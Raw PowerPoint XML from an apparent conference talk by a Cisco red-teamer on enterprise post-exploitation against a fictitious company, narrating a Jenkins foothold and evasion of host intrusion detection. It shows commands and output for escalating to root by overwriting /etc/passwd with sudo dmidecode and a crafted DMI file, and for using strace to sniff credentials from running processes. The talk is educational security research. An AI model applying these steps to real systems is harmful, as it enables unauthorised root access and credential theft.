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tags/tag2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2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide31.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag23.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide32.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag24.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide33.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag25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2" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId39"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="264" r:id="rId3"/>
    <p:sldId id="296" r:id="rId4"/>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="303" r:id="rId6"/>
    <p:sldId id="281" r:id="rId7"/>
    <p:sldId id="282" r:id="rId8"/>
    <p:sldId id="283" r:id="rId9"/>
    <p:sldId id="263" r:id="rId10"/>
    <p:sldId id="261" r:id="rId11"/>
    <p:sldId id="286" r:id="rId12"/>
    <p:sldId id="314" r:id="rId13"/>
    <p:sldId id="319" r:id="rId14"/>
    <p:sldId id="316" r:id="rId15"/>
    <p:sldId id="262" r:id="rId16"/>
    <p:sldId id="308" r:id="rId17"/>
    <p:sldId id="312" r:id="rId18"/>
    <p:sldId id="309" r:id="rId19"/>
    <p:sldId id="307" r:id="rId20"/>
    <p:sldId id="292" r:id="rId21"/>
    <p:sldId id="299" r:id="rId22"/>
    <p:sldId id="266" r:id="rId23"/>
    <p:sldId id="267" r:id="rId24"/>
    <p:sldId id="270" r:id="rId25"/>
    <p:sldId id="274" r:id="rId26"/>
    <p:sldId id="275" r:id="rId27"/>
    <p:sldId id="318" r:id="rId28"/>
    <p:sldId id="278" r:id="rId29"/>
    <p:sldId id="310" r:id="rId30"/>
    <p:sldId id="279" r:id="rId31"/>
    <p:sldId id="288" r:id="rId32"/>
    <p:sldId id="290" r:id="rId33"/>
    <p:sldId id="313" r:id="rId34"/>
    <p:sldId id="295" r:id="rId35"/>
    <p:sldId id="317" r:id="rId36"/>
    <p:sldId id="304" r:id="rId37"/>
    <p:sldId id="30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2F2"/>
    <a:srgbClr val="FF0000"/>
    <a:srgbClr val="8D8D8D"/>
    <a:srgbClr val="C00000"/>
    <a:srgbClr val="DD0000"/>
    <a:srgbClr val="980000"/>
    <a:srgbClr val="E70000"/>
    <a:srgbClr val="FF294A"/>
    <a:srgbClr val="00FFFF"/>
    <a:srgbClr val="00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04"/>
    <p:restoredTop sz="94643"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="93" d="100"/>
          <a:sy n="93" d="100"/>
        </p:scale>
        <p:origin x="22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A27C4-E7C2-7043-A80D-DDA07AE8183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63D3C-B50A-3543-AB58-5203F8657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69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Many testers have love-hate with Jenkins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Worst case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"Manage Jenkins" = don't have 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51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run jobs, however – and some sudo – so where do we have shell?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1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run jobs, however – and even some sudo access – so where do we have shell?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7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another method to get root on www. And for that we need privesc on build.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17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favorite part of red team - custom exploit writing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Step back and pivot from build server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Desktop Management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46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89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93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to re-log in; zero uid can be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98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Entry point structure prepends 32 nulls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thelas" panose="02000503000000020003" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>Do not puncture or incinerate.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29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2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Box goes dark? – host intrusion detection; speed or stealth?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0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 and blue tech similar; GRR rapid response = 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PCI-DSS – read memory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3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help vs ssh keys or OTPs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>kernel.yama.ptrace_scope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1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Avalanche of output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Service account osiris on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0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3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stealthtrace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74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strace is almost designed for hardcoded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60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12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65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Hired to perform RT/pentest against SedgeCom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15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Head on attack: get caught;  appropriate evasion: success; too much evasion: caught in web of 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86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dmidecode escalation; 2. pivot to storefront using osiris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41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magecart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6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Works for credentials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64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06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9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Number of boxes popped is not a good metric. No mass scans.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5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Simplified network diagram. Obtained alice domain account. Endpoint protection in place.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3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0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Google Transparency Report</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Behind the firewall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79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Foothold of low priv user; ldap utils; don't burn creds.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25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target - many writeups on exploiting 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3D3C-B50A-3543-AB58-5203F8657C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4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01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70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8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 baseline="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="2000" baseline="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="1800" baseline="0"/>
            </a:lvl3pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1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10/9/18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6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74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0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5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0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1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7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hyperlink" Target="https://github.com/strace/stra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0.png"/><Relationship Id="rId2" Type="http://schemas.microsoft.com/office/2007/relationships/media" Target="../media/media1.mp3"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag21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timewarpadam" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/adamreiser" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:reiser@defensivecomputing.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5E01-93C1-B342-82E0-24A9B2662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86744"/>
            <a:ext cx="12192000" cy="1645920"/>
          </a:xfrm>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="47000">
                <a:schemeClr val="accent2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="98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>
                <a:latin typeface="Athelas" panose="02000503000000020003" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>Living off the 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1B0FD-C75F-0748-BE9A-9DACC20C3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475" y="3927734"/>
            <a:ext cx="7173331" cy="1239894"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" i="1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Enterprise post-exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg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2F7B-A877-214A-8D79-1C61E87F4279}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4025818" y="4844462"/>
            <a:ext cx="414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Adam Reiser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Cisco Advanced Security Initiatives Group</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379365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5"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="85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9757-3634-0540-802A-CF31717A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Jenkins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2F48D-6206-B346-8CCF-AB6E5437E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60037" y="2559364"/>
            <a:ext cx="8271926" cy="3600552"/>
          </a:xfr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5D5EE-9DDC-8D4F-AC67-16A83DE16EDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5893111" y="2559364"/>
            <a:ext cx="3418504" cy="2399582"/>
            <a:chOff x="6055280" y="3506543"/>
            <a:chExt cx="2727800" cy="196786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A88E4DD-D7E2-204F-8256-5E52C4891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272703">
              <a:off x="7955288" y="3506543"/>
              <a:ext cx="827792" cy="8242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399C8EB-1E01-A240-B023-33777AF3F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272703">
              <a:off x="7210022" y="3721159"/>
              <a:ext cx="827792" cy="82429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2DED95F-225B-2243-8CF5-D6E78D490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693366">
              <a:off x="6669949" y="3892039"/>
              <a:ext cx="603976" cy="6014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2F5F24-CFC1-F44F-A8ED-6E3075D9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272703">
              <a:off x="6885324" y="4422823"/>
              <a:ext cx="584516" cy="5820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83C63B-DF44-324C-BAD3-87D3ED01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272703">
              <a:off x="7668550" y="4356467"/>
              <a:ext cx="666169" cy="66335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C00C02F-394E-834B-BB38-9537DE42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81189">
              <a:off x="6192533" y="4509705"/>
              <a:ext cx="666169" cy="66335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B0E3E7-8344-7B4E-A52A-1645CCF19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610563">
              <a:off x="6672238" y="4991792"/>
              <a:ext cx="464108" cy="46214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BE81960-D711-D14E-8C8B-8179C02F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272703">
              <a:off x="7199186" y="4903853"/>
              <a:ext cx="572976" cy="57055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F7949E6-8262-CA48-9CEB-B8DDD7B4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943584">
              <a:off x="6055280" y="4022749"/>
              <a:ext cx="557151" cy="5548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2989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10"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="2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96AA57-92E9-F042-B4EC-C631DC61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807950"/>
            <a:ext cx="6477000" cy="604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A177F0-7936-4142-B6E8-0B3288A11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9921"/>
            <a:ext cx="12192000" cy="4081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55C22C-C27D-754F-90DF-3AD5C213E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14430"/>
            <a:ext cx="12192000" cy="2632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712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48"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="130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8650099-80D7-3248-A297-E7A00E7FE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1433479"/>
            <a:ext cx="119253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7881C-3267-604F-9FAC-FE406275A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827" y="1428350"/>
            <a:ext cx="8992347" cy="4800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07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48"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="130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B8062-EF12-144D-9DA7-4F7DCB5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89" y="1764646"/>
            <a:ext cx="11927461" cy="3223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117DBC-2374-DD47-8CA0-B12692B2CF8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3086438" y="3919753"/>
            <a:ext cx="30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No executors on master :(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E1FD9-C910-6F4C-B167-EF2E3EEDA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48" y="4232261"/>
            <a:ext cx="6138334" cy="17721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607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48"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="130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6B5EC-AFF7-EB44-847C-918AE211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4166269"/>
            <a:ext cx="10642600" cy="170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0396B-0C71-DC47-81EF-2C075621F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34"/>
            <a:ext cx="12192000" cy="2888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C669BF-4081-8741-B740-FAB294E7A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5434"/>
            <a:ext cx="12192000" cy="5304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355951-D468-9B4D-A86E-B2D3455DB0C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5550" y="489866"/>
            <a:ext cx="5039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Can we run this job on www?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D5AE59-EC3B-ED4B-82A9-012CB62744EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7531308" y="4033921"/>
            <a:ext cx="5048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latin typeface="Athelas" panose="02000503000000020003" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>sudo fail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latin typeface="Athelas" panose="02000503000000020003" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>different configs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latin typeface="Athelas" panose="02000503000000020003" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>maybe got caught</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="392807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A556-0F1D-8040-86B1-F7B3DBD5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DMI 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3CF7-48DD-474E-8CD6-91AF2EAFB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Privilege escalation using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dmidecode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Not a vulnerability in dmidecode itself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Crafted DMI table allows arbitrary file write</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Therefore sudo dmidecode leads to root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80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6"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="11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A556-0F1D-8040-86B1-F7B3DBD5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DMI Exploit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AD975-6FA7-D145-AB66-97E2F0B15BB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1961718" y="2875139"/>
            <a:ext cx="799914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>
                <a:solidFill>
                  <a:srgbClr val="0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jenkins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~]$ sudo -l</a:t>
            </a:r>
          </a:p>
          <a:p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 jenkins may run the following commands on build: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(ALL) NOPASSWD: /usr/sbin/dmidecode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="408014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43"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="10934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A556-0F1D-8040-86B1-F7B3DBD5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DMI Exploit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AD975-6FA7-D145-AB66-97E2F0B15BB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1961718" y="2875139"/>
            <a:ext cx="799914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>
                <a:solidFill>
                  <a:srgbClr val="0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jenkins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~]$ sudo dmidecode --no-sysfs -d /tmp/crafted.dmi --dump-bin /etc/passwd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dmidecode 3.0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Scanning dmi for entry point.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SMBIOS 2.1 present.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structures occupying 1209 bytes.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 at 0x00000000.</a:t>
            </a:r>
          </a:p>
          <a:p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Writing 1209 bytes to /etc/passwd.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Writing 0 bytes to /etc/passwd.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/etc/passwd: fwrite: No such file or directory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EABE9-23C1-C54A-BF0A-E11E206ED208}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1961718" y="2875139"/>
            <a:ext cx="799914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>
                <a:solidFill>
                  <a:srgbClr val="0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home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~]# ./dmiwrite trojan_passwd.in crafted.dmi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Wrote payload of length 1209 to crafted.dmi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Padding 981831 bytes to crafted.dmi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Setting checksum: memset(buf+30, 170, 1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:b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Wrote DMI header of length 32 to crafted.dmi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Padding 65536 bytes to crafted.dmi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Congratulations, crafted.dmi looks like a valid DMI file.</a:t>
            </a:r>
          </a:p>
          <a:p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43"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="109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A556-0F1D-8040-86B1-F7B3DBD5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DMI Exploit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AD975-6FA7-D145-AB66-97E2F0B15BB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1961718" y="2875139"/>
            <a:ext cx="799914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>
                <a:solidFill>
                  <a:srgbClr val="0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jenkins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~]$ id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uid=0(jenkins) gid=1000(jenkins) groups=1000(jenkins) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34650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4"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="3476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ED3F-7ED4-F74F-B7C0-220155DC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DMI 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8DE1-8F16-4B4C-99E3-35F7F0E13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910" y="2438476"/>
            <a:ext cx="8602179" cy="3499285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#0  write_dump (base=0x20, len=, data=, dumpfile= "/etc/passwd", add=0x0) at util.c:254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#1  dmi_table_dump (buf= "\nroot:", len=) at dmidecode.c:4607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  dmi_table (base=0x0, len=, num=0x1, ver=0x20100) at dmidecode.c:4778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#3  smbios_decode (buf= "_SM_", devmem= "/tmp/crafted.dmi", flags=0x1) at dmidecode.c:4887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#4  main (argc=, argv=) at dmidecode.c:5107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89BBEA-C671-E746-97E6-20DA8F3053F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1794909" y="2438476"/>
            <a:ext cx="8602179" cy="33733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#0  write_dump (base=0x0, len=0x0, data=, dumpfile= "/etc/passwd", add=0x1) at util.c:254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#1  smbios_decode (buf= "_SM_", devmem= "/tmp/crafted.dmi", flags=0x0) at dmidecode.c:4900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  main (argc=, argv=) at dmidecode.c:5107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24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13"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="91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03D9-9676-4349-8EB1-66D71C96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29E3-4825-CB4C-9199-AE55AED54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52894"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Athelas" panose="02000503000000020003" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>Who am I?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Athelas" panose="02000503000000020003" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>Adam Reiser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Athelas" panose="02000503000000020003" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>Security Research Engineer at Cisco – red team and appsec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Athelas" panose="02000503000000020003" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>All opinions are my own</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Athelas" panose="02000503000000020003" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>What is this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Athelas" panose="02000503000000020003" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>Composite of 2018 red team engagements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Athelas" panose="02000503000000020003" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>Target is the fictitious SedgeCom Enterprises</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Athelas" panose="02000503000000020003" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>Tools for authorized testing and educational purposes only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Athelas" panose="02000503000000020003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153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17"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="51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41B336-A0AA-3941-B27D-658C3DBA0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96" y="1210059"/>
            <a:ext cx="10387283" cy="3410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290DB-9945-C14C-ACE1-C72E9A77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26" y="1210059"/>
            <a:ext cx="10621623" cy="4524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1C366-D59F-FF4C-A723-0A7CDC60E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226" y="2423976"/>
            <a:ext cx="10621626" cy="2434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179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71"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="85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A55C5B-C924-6141-ABEA-E3F8EA15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37" y="1583363"/>
            <a:ext cx="8580127" cy="333008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107183-7FE2-374B-AC55-7E4570ED9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7264" y="1683375"/>
            <a:ext cx="9237471" cy="349125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201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95"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="81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C575-D90D-8043-BFC3-24D6A7A8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so Fast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EAC03-BE6D-764D-899B-83D73277F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523" y="2638425"/>
            <a:ext cx="4280954" cy="310197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79063D-5337-4D49-B80C-6B53ABAB198F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20481916">
            <a:off x="2275654" y="2450977"/>
            <a:ext cx="4867351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-----BEGIN RSA PRIVATE KEY-----</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="16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Proc-Type: 4,ENCRYPTED</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="16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DEK-Info: AES-128-CBC,E5CCD2DA31B1B1A5DBF1CCC76ECB43A5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8DF736-AB75-9942-AF49-5018B579937C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3208062" y="5740400"/>
            <a:ext cx="5713883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Ssl Aug28 16:15 /var/ossec/bin/ossec-agentd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="16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  Aug28 16:15 /opt/rapid7/ir_agent/ir_agent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037A58-AB58-444C-9F79-244D2666B726}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1736884">
            <a:off x="5073864" y="2676898"/>
            <a:ext cx="4716651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-----BEGIN DSA PRIVATE KEY-----</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="16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Proc-Type: 4,ENCRYPTED</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="16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DEK-Info: AES-128-CBC,7F35BC83F67094EE895B3E1BFF077548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6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60"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="4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3849-A7A0-4C40-A27C-9F47EC46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So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0DA0-6666-2E40-9483-2029ACD83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No cleartext secrets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Process list evidence of HIDS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Disk-based signatures?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>File integrity?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Process monitoring?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>What happens if the box goes dark?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7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55"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="36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0699-39F5-8243-AC9F-6A38E67E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Offensive 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0F159-0CC1-584A-995E-AE0971B6A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Just read /dev/mem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Repurpose blue team and dev tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>strace sensitive processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Weak NIDS?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Forward traffic and process off-box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/>
              <a:t>Weak HIDS?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>On-box MitM, trojan binaries, keylog, etc.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30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68"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="81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2F31-F0BA-2A40-9BEB-F596716B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81E7B-FA60-0945-9590-227FD3DB9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Swiss army microscope of process inspection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ptrace() under the hood</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Pros</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Mature, stable, and well supported software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Frequently present by default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Cons</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Suspicious looking process; produces a lot of output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Off-the-shelf strace only for passive interception;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Deniable by SELinux and yama security module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68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33"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="66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C691-228A-AA46-9106-5890D288F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489" y="1561540"/>
            <a:ext cx="8966516" cy="3101983"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx1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~# strace -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i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&lt;pid&gt; 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-e read –f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1AC06-C1EA-C64E-A0E3-BA7BF5A548BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280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C639DA-8CB9-FA43-9529-9BBE92567839}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1516489" y="2346108"/>
            <a:ext cx="8836379" cy="2317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11070] read(3, "#\n# OpenSSL example configuratio"..., 4096) = 4096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11070] read(3, "ancient versions of Netscape cra"..., 4096) = 4096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11070] read(3, "gainst PKIX guidelines but some "..., 4096) = 2731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8059CBB-C077-E44E-88FF-6D9CB3CCE3A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1516488" y="2346108"/>
            <a:ext cx="8836379" cy="2317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11071] read(6, "# GSS-API mechanism plugins\n#\n# "..., 4096) = 189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11071] read(6, "", 4096)           = 0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11071] read(6, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0&gt;\0\1\0\0\0\220|\0\0\0\0\0\0"..., 832) = 832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A9B1889-E8B1-824D-9761-2019B8A57846}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1516488" y="2346107"/>
            <a:ext cx="8836379" cy="2317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12174] read(6, "\0\0\0\6osiris", 10) = 10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12174] read(4, "multi on\n", 4096) = 9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12174] read(4, "", 4096)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D77E2D-5682-5D48-8615-A6482B8CAD7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
